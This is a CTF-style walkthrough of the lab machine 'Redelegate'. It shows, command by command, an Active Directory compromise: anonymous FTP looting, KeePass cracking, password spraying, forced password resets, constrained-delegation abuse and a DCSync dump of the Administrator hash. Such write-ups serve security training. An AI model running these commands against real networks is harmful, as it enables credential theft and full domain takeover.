# Redelegate ## OVERVIEW --- ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767160406935/f0af5174-99e5-4289-8875-fce36443de5c.png align="center") So we are given IP of the machine let’s scan it using Nmap --- ## ENUMERATION ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767160456481/ba523036-9569-4f7c-a9eb-d9927d4104a9.png align="left") ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767160527547/1c702452-f065-4bbd-9264-697953fd1695.png align="center") So we see that Anonymous Login is allowed in FTP so let’s just dump all its contents and directories and also don’t forget to add the domain and DC name into **/etc/hosts** To dump the content inside FTP server using anonymous login: ```apache wget -m --no-passive ftp://anonymous:anonymous@10.129.234.50 ``` You will get all the contents on your working directory ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767160774824/d0538a29-e702-40a3-9565-66c85aff3d24.png align="left") Let’s analyze each file one by one So on analyzing **CyberAudit.txt and TrainingAgenda.txt** ```apache Friday 18th October | 11.30 - 13.30 - 7 attendees "Weak Passwords" - Why "SeasonYear!" is not a good password ``` So only 7 attendees means people are still using **SeasonYear!** type passwords and we also saw another **Shared.kdbx** file which is a **Keepass 2.x** file of which we could get its password by using John The Ripper tools as ```apache keepass2john Shared.kdbx > keepass.hash john --wordlist=/path-to-your-wordlist ``` Since we know that People are using SeasonYear! type passwords so let’s quickly create a custom wordlist **pass.txt** of these type of passwords according to seasons ```plaintext SeasonYear! Summer2024! Winter2024! Fall2024! Spring2024! Autumn2024! ``` **NOTE: we used the year 2024 because its 2024 in the CyberAudit.txt as we saw above and if you try to crack the Shared.kdbx file using rockyou.txt then it will take ages to complete** now let’s try to crack Shared.kdbx file password using the above wordlist ```apache john --wordlist=/path-to-pass.txt ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767161964028/ecf98e2f-472a-4967-ab99-718a5ac7d7ac.png align="center") So we got the password successfully and now let’s use **kpcli** to login into the file **Shared.kdbx** ```apache kpcli --kdb=Shared.kdbx ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767162119732/b0ab1401-6236-4147-925b-aef7bf3ea068.png align="left") Now since you are inside , now enumerate the directories using **ls , cd** commands and to see particular passwords use the show command such as show 0 , show 1 and so on…. ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767162756340/6f9a2315-7905-43f3-9f38-996156a4d2f4.png align="left") The passwords are hidden under a red flag so to see them just copy them and paste somewhere or in a text editor On enumerating the Shared.kdbx completely and getting all the passwords make a list of users and passwords differently to enumerate which service is working for which credentials ```plaintext Payroll Timesheet Administrator FTPUser SQLGuest WordPress Panel ``` ```plaintext SeasonYear! Summer2024! Winter2024! Fall2024! Spring2024! Autumn2024! cVkqz4bCM7kJRSNlgx2G hMFS4I0Kj8Rcd62vqi5X 22331144 Spdv41gg4BlBgSYIW1gF SguPZBKdRyxWzvXRWy6U zDPBpaF4FywlqIv11vii cn4KOEgsHqvKXPjEnSD9 ``` Now we can use netexec to brute force the creds among services like FTP , SMB , MSSQL , LDAP , WINRM etc. So none of them worked in services above except MSSQL ```apache nxc mssql 10.129.234.50 -u users.txt -p pass.txt --continue-on-success --local-auth ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767164123112/fcc9890f-1f34-4604-b39f-23ee955396c1.png align="center") Now I used mssqlclient.py to enumerate the sql server but couldn’t get any useful there to get us some lead so then i thought about **—rid-brute using the MSSQL creds we got** ```apache nxc mssql 10.129.234.50 -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --rid-brute --local-auth ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767164399586/251b0fb0-1088-4922-96d1-8a6dffbd20e0.png align="center") **Now there is a possibility of password reuse with the new users we got so let’s brute force the new users with our earlier pass.txt** ```apache nxc smb 10.129.234.50 -u new_users.txt -p pass.txt --continue-on-success ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767164953872/fd1bcad3-e05a-4c50-b9d9-fc937b426eaf.png align="left") Here we go we got **Marie.Curie** user but we are not able to get a foothold through Marie.Curie and its shares are also not much of any use so let’s run bloodhound to see what is happening. ```apache bloodhound-python -u Marie.Curie -p 'REDACTED' -d redelegate.vl -ns 10.129.234.50 -c ALL --zip ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767166548352/9eb30414-6d25-4b1a-9394-fb3c3c4ae4af.png align="center") Now on seeing High Value Target from Owned Principles we see ```plaintext Marie.Curie -> Member of HelpDesk@Redelegate.vl -> force change password -> Helen.Frost@Redelegate.vl ``` **So that means we can change the password of Helen.Frost user and then can get a shell/foothold as Helen.Frost** ```apache bloodyAD -d redelegate.vl -u Marie.Curie -p 'REDACTED' --host dc.redelegate.vl set password Helen.Frost 'Password123!' ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767166863892/82393c12-cbcc-44a3-9062-b1558db8507e.png align="center") Password is changed successfully now let’s see if we can get the shell or not ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767166991065/b04c4f6d-684e-408a-86ef-064c50e3dc22.png align="center") Yep we can, So let’s use evil-winrm to get the shell and grab the user flag --- ## USER FLAG ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767167138872/993af5bb-935a-4ef1-a634-ce8a79869bc4.png align="left") --- ## PRIVILEGE ESCALATION Let’s see what privileges do we got by **whoami /priv** ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767168248009/75ce29b5-829d-40a9-90fb-dd965fe29d65.png align="center") **SeMachineAccountPrivilege and SeEnabledDelegationPrivilege is Enabled** But we can’t either add machine account or dnsrecord as: ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767168894114/48ee05a9-6833-434f-a70e-632c64911513.png align="center") **MachineAccountQuota** is 0 and **INSUFF\_ACCESS\_RIGHTS** for adding DNS Record into a domain **(Usually this would be done through Marie.Curie Creds in order to Obtain NTLM HASH through responder but i am just showing that it is not allowed to add DNS Record in the domain irrespective of any user)** So let’s find another method to escalate privileges Now In Bloodhound we saw that user Helen.Frost has Group Delegated Object Control ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767169176104/dbeb29e3-6e70-4dca-b19d-30aefda1bd3a.png align="center") So, Helen.Frost user account is a member of the IT group, which has the GenericAll ACL on the FS01$ machine account. We know we cannot add a DNS record and machine account from our previous enumeration. So we cannot configure unconstrained delegation because we need to force the machine to craft a Kerberos ticket, which isn't possible with an IP Address only; it requires SPN and DNS A record. **However, we can configure the FS01$ machine account to perform a full S4U2self + S4U2proxy (Constrained Delegation) attack on the DC$ machine account and use that service ticket to perform a DCSync attack** Since we have GenericAll on FC01$ machine account we can force change its password using TGT of Helen.Frost ```apache getTGT.py redelegate.vl/helen.frost:'Password123!' export KRB5CCNAME=helen.frost.ccache ``` ```apache bloodyAD -k --host 'dc.redelegate.vl' set password 'FS01$' 'Newpassword123!' ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767169942175/79fdaf47-399f-48ad-a8c6-9fadcdeb0565.png align="center") Now let’s configure FS01$ for TRUSTED\_TO\_AUTH\_FOR\_DELEGATION and AllowedToDelegateTo properties. Let’s begin configuring ```apache bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" add uac FS01$ -f TRUSTED_TO_AUTH_FOR_DELEGATION bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set object FS01$ msDS-AllowedToDelegateTo -v cifs/dc.redelegate.vl ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767170925431/8d6c76c6-bec9-448b-88bc-64b957a6b9f5.png align="center") **Now take FS01$ TGT similarly like Helen.Frost** ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767171322840/6f7ae6b1-bcbc-4a1e-a374-e624734889f1.png align="center") Now get Service Ticket and impersonate dc ```apache getST.py -k -no-pass -spn cifs/dc.redelegate.vl -impersonate dc redelegate.vl/FS01$ export KRB5CCNAME=dc@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767171768834/2164db99-8c9c-4d92-8b81-afe61914f634.png align="center") Now let’s perform DC-Sync attack and grab Administrator Hash ```apache secretsdump.py -k -no-pass dc.redelegate.vl -just-dc-user Administrator ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767172080779/261a7579-a3fe-4960-bd40-f8d56da5dd56.png align="center") We got the hash now use it to get a shell and grab the root flag --- ## ROOT FLAG ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767172205260/7adbb9a7-47b8-4321-81ed-2f07c98035c0.png align="center") ## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!** ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767172314985/8b37c394-0dfb-4355-9831-d870595bbdc1.png align="center") For Any Query Or Problem Either Leave A Comment Or Contact At [**reapsec.com**](http://reapsec.com/) **THANKS FOR READING !!!**